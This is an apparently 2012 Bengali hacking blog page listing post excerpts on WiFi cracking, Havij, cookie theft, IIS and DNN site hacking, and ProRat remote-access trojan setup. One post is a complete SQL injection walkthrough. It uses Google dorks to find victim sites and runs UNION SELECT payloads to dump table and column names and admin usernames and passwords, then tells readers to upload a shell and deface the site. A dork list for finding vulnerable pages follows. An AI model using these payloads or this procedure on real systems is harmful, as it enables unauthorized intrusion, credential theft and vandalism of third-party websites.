Programming + Security + Electronics

Flow of Codes

Computer Programming

Programming + Security + Electronics

Flow of Codes 010101010101

Learn better programming for better Security

Electronics

Circuits

I'm newbie

Trying to do something better

Tuesday, August 21, 2012

BackTrack ব্যবহার করে Wifi হ্যাকিং

2:55 PM  , , ,  1 comment
BackTrack এর মাধ্যমে ওয়াইফাই হ্যাক করার জন্য প্রথমে BackTrack এ লগিন করে Terminal ওপেন করে লিখুন ঃ
airmon-ng

Read More
Extend >>

Friday, May 25, 2012

URL Base SQL Injection

7:43 PM    No comments
অনেক সময় দেখা যায়
www.xample.com/index.php?id=1 order 999-- [ no error ]
অর্থাৎ order by 999 দিলেও কোন error দেখায় না ।
এক্ষেত্রে -- এর পর + এবং id=1 এর পর ' sign দিতে হবে ।

Read More
Extend >>

Sunday, May 13, 2012

SQL Injection advance level

6:59 AM  , ,  No comments
হ্যাকিং পদ্ধতি গুলোর মধ্যে সবচেয়ে কার্যকর পদ্ধতি হচ্ছে SQLi Injection.
এই পদ্ধতিতে হ্যাকিং এর জন্য প্রথমে dork ব্যবহার করে SQLi vulnerable সাইট খুঁজে বের করতে হবে।
SQLi এর Dork এখানে। আপনি যেকোনো dork ব্যবহার করতে পারেন, আপনার পছন্দ মতো।
Read More
Extend >>

Thursday, May 3, 2012

Havij Tools ব্যবহার করে হ্যাকিং

12:48 PM  , ,  No comments
আমি Personally কখনও Havij ব্যবহার করিনি । তাই এটি সম্পর্কে ভাল ধারনা নেই ।
যারা Manually SQLi একদমই পারেন না তারা ব্যবহার করতে পারেন ।
তবে আমার মতে Havij ব্যবহার না করে একটু কষ্ট হলেও Manually শিখা ভাল ।
Read More
Extend >>

BLIND SQL INJECTION Banglay

4:53 AM  , , ,  No comments

(). Vulnerablity বের করা

সাইটটি Vulnerable কিনা দেখার জন্য লিংকের শেষে লিখুন "and 1=2"

উদাহরন : http://example.com/index.php?id=2 and 1=2

Read More
Extend >>

Wednesday, April 25, 2012

Banglalion Modem চালান Linux এ ( Ubuntu 11.04/11.10 )

9:37 AM  , , , , ,  4 comments

যারা Ubuntu 11.04/11.10 Banglalion Modem চালাতে চান তারা প্রয়োজনীয় সফটওয়্যার গুলো ডাউনলোড করে নিন এখান থেকে ( blion-wimax-0.0.2.deb )
** যারা Banglalion এর ZTE AX226 modem চালান তারা উপরের সফটওয়্যারটির সাথে সাথে  Beceem-Control-Panel সফটওয়্যারটিও ডাউনলোড করে নিন ।
Read More
Extend >>

Thursday, March 1, 2012

Cookies চুরি করে ইমেইল হ্যাকিং (Updating)

12:43 PM  , , ,  No comments
যখন আমরা একটি ইমেইল আইডিতে লগইন করি তখন ব্রাউজার এ কিছু unique string উৎপন্ন হয় । এই unique string এর এক কপি server এ এবং অন্য এক কপি ব্রাউজার এ cookie হিসেবে জমা হয় । যখনই আমরা আমাদের মেইল অ্যাকাউন্ট এ কিছু করি তখন এই ২ কপি string মিলিত হয়ে কাজ করে । আমরা যখন 'Sign Out' করি তখন এই cookie গুলো ধ্বংস হয়ে যায় ।
Read More

Monday, February 27, 2012

IIS hacking method (Banglay) [completed]

2:28 AM  , ,  2 comments
IIS windows এর একটা exploit যা দিয়ে website হ্যাক করা যায়।
IIS এর মাধ্যমে website হ্যাক করার জন্য প্রথমে
Start > Run এ যাব , তারপর লিখবো
Read More
Extend >>

Saturday, February 25, 2012

SQL Injection (Banglay)

1:34 PM  , , ,  No comments

হ্যাকিং পদ্ধতি গুলোর মধ্যে সবচেয়ে কার্যকর পদ্ধতি হচ্ছে SQLi Injection.
এই পদ্ধতিতে হ্যাকিং এর জন্য প্রথমে dork ব্যবহার করে SQLi vulnerable সাইট খুঁজে বের করতে হবে।
SQLi এর Dork এখানে।
আপনি যেকোনো dork ব্যবহার করতে পারেন, আপনার পছন্দ মতো।
ধরুন আমরা index.php?id= এই Dork টি নিলাম।
এখন www.google.com এ গিয়ে উপরের Dork টি লিখে সার্চ দিলে নিচের মত ফলাফল আসবে।
সার্চ ফলাফল থেকে যেকোনো একটি সাইট নিয়ে তা পরীক্ষা করবো যে তা SQLi vulnerable কিনা।
মনেকরি, www.example.com/index.php?id=xx এই সাইট টি নিলাম।
এখন সাইটটির vulnerabilities পরীক্ষার জন্য xx এর আগে অথবা পরে ‘ Sign টি দিয়ে ওকে করলে যদি
You have an syntax error in your SQL syntax.” এমন error দেয় তাহলে বুঝতে হবে সাইট SQLi vulnerable.

এখন সাইটটির কলাম সংখ্যা বের করতে হবে। এজন্য লিখবো
www.example.com/index.php?id=xx order by 1 - -
অর্থাৎ xx এর পর শুধু order by 1 - - যোগ করবো। এখানে 1 হচ্ছে কলাম সংখ্যা।
(যারা মোবাইল থেকে করবেন তারা space এর বদলে + দিবেন)
যদি এতে কোন error না দেয় তবে লিখবো
www.example.com/index.php?id=xx order by 2 - - দিবো।
এভাবে কলাম সংখ্যা বৃদ্ধি করে অর্থাৎ 1,2,3,3,4,5…………… দিয়ে দেখতে থাকবো কোনটিতে error দেয়।
যখন order clause 500 এমন error দিবে তখন থামবো।
ধরুন কলাম সংখ্যা 6 এ উপরের মত error  দিলো তাহলে বুঝতে হবে এর কলাম সংখ্যা 5 .
কলাম সংখ্যা পেলাম। এবার বের করবো কোন কলামটি vulnerable.
এর জন্য xx এর পর union select all ক্রমানুসারে কলাম সংখ্যা – লিখবো এবং xx এর আগে – sign টি দিবো। তাহলে লিঙ্কটি হবে
www.example.com/index.php?id=-xx union select all 1,2,3,4,5,6--
এখন ওয়েবপেজে কলাম সংখ্যার মধ্যে যে সংখ্যা গুলো দেখা যাবে তাই vulnerable কলাম।
একাধিক সংখ্যা দেখালে যেটি deep বা bold বা colord হবে সেটি নিবো।
ধরি উপরের সাইটটির ক্ষেত্রে কলাম সংখ্যা পেলাম 5 .
তাহলে 5 নম্বর কলামটির database version বের করবো।
তার জন্য লিখবো
www.example.com/index.php?id=-xx union select all 1,2,3,4,@@version,6- -
অর্থাৎ শুধু মাত্র 5 এর জায়গায় @@version লিখবো।
এখন দেখা যাবে ওয়েবপেজ এর যেই জায়গায় 5 লিখা আসছিল সেখানে database version (5.xx.xx -log) দেখাবে। যদি database version 5 হয় তাহলে continue করব, অন্যথায় সাইটটি বাদ দিবো। কারন এই পদ্ধতিটি database version 5 এর জন্য।
ধরে নেই database version 5 পাওয়া গেছে।
এবার সাইটটির টেবিল সংখ্যা বের করবো তার জন্য লিখবো
www.example.com/index.php?id=-xx union select all 1,2,3,4,group_concat(table_name),6 from information_schema.tables where table_schema=database()- -
ফলে  যেইখানে database version লিখা আসছিলো, সেখানে টেবিল নাম আসবে নিচের মত...
এখান থেকে অনুমান করতে হবে কোন টেবিলটিতে ইউজার নাম এবং password থাকতে পারে।
উপরের টেবিল গুলোর মধ্যে admin টেবিলটি দেখে সহজেই বুঝা যায় যে admin এর মধ্যে username & password থাকতে পারে।
এখন admin টেবিল নামকে explore করে কলাম নাম বের করবো। এজন্য লিখবো
www.example.com/index.php?id=-xx union select all 1,2,3,4,group_concat(column_name),6 from information_schema.columns where table_name=0xhex code of admin- -
*** admin এর হেক্স কোড বের করবো
www.string-functions.com/string-hex.aspx থেকে।***
এখন কলাম নাম পাবো নিচের মতো...
কলাম নাম থেকে username & password বের করতে লিখবো
www.example.com/index.php?id=-xx union select all 1,2,3,4,group_concat((id,0x3a,user,0x3a,pass,0x3a,email),6 from যে টেবিল থেকে কলাম নাম পেয়েছি তার নাম - -
এখন নিচের মতো দেখাবে।
ব্যস পেয়ে গেলেন username & password .
( password যদি Hash কোডে বের হয় তাহলে Hash decrypte করুন এখান থেকে। )
Username & password দিয়ে সাইটটিতে লগইন করতে দরকার admin panel.
সাইটটির এডমিন প্যানেল বের করুন 
এডমিন প্যানেল পেয়ে গেলে লগইন করুন এবং সাইটে shell upload করে deface করুন।

Read More

Monday, February 13, 2012

All Goolge Dork List

12:55 AM  ,  No comments
/* Google Dork List*/

trainers.php?id=
article.php?ID=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
newsDetail.php?id=
staff_id=
historialeer.php?num=
product-item.php?id=
Read More
Extend >>

Tuesday, February 7, 2012

কিছু প্রয়োজনীয় সফটওয়্যার ডাউনলোড লিঙ্ক (Updating)

3:01 AM    No comments
সফটওয়্যার গুলো সবার কাজে লাগবে আসা করি ।
1. FireFox v1
2. Mantra browser (বেশির ভাগ হ্যাকাররা এই ব্রাউজার ব্যবহার করে।)
3. Mantra browser(portable)
4. Youtube video downloader (portable)
5. Havij hacking tools
6. Prorat hacking tools
Read More

Tuesday, January 31, 2012

ProRat hacking (বাংলায়) [Completed]

7:56 AM    1 comment
ProRat কি ?
সংক্ষেপে ProRat হল Trojon এবং রিমোট অ্যাডমিনিস্ট্রেশন টুল (RAT) যা victim এর পিসির এবং ব্যক্তিগত তথ্য চুরি করে আনতে পারে
ProRat এর ব্যবহার পদ্ধতি :
অনেক ভাবে ProRat ব্যবহার করা যায়। এখানে সহজ একটি পদ্ধতি সম্পর্কে আলোচনা করা হল।
প্রথমে ProRat ডাউনলোড করে নেই এখান থেকে
এরপর এখানে ক্লিক করে No-IP এ একটি অ্যাকাউন্ট খুলি।
এবার DNS Update Client ডাউনলোড করি। ডাউনলোড শেষে প্রোগ্রামটি রান করে Host-name আপডেট করে রাখি।
Read More
Extend >>

Wednesday, January 25, 2012

DNN ওয়েব সাইট হ্যাকিং মেথড (বাংলায়) [Completed]

1:45 PM  , , ,  14 comments
প্রয়োজনীয় ঃ ১. Mozilla Firefox v.4 -> ডাউনলোড করুন এখান থেকে
                ২. Mantra browser -> ডাউনলোড করুন এখান থেকে (WinXP)  ,  Portable version  ,
( Google Chrome ব্যবহার করাও কাজ করতে পারবেন )
এই মেথড এ ওয়েবসাইট হ্যাক করতে প্রথমে DNN vulnerable সাইট বের করতে হবে। এ জন্য dork এর মাধ্যমে DNN vulnerable সাইট বের করে নেব। উদাহরন হিসেবে inurl:/tabid/36/language/en-US/Default.aspx এই dork টি নিনাম।
এখন www.google.com এ যায়ে উপরের dork টি লিখে সার্চ দিলে নিচের screenshot এর মত result আসবে।
Read More
Extend >>
Subscribe to: Comments (Atom)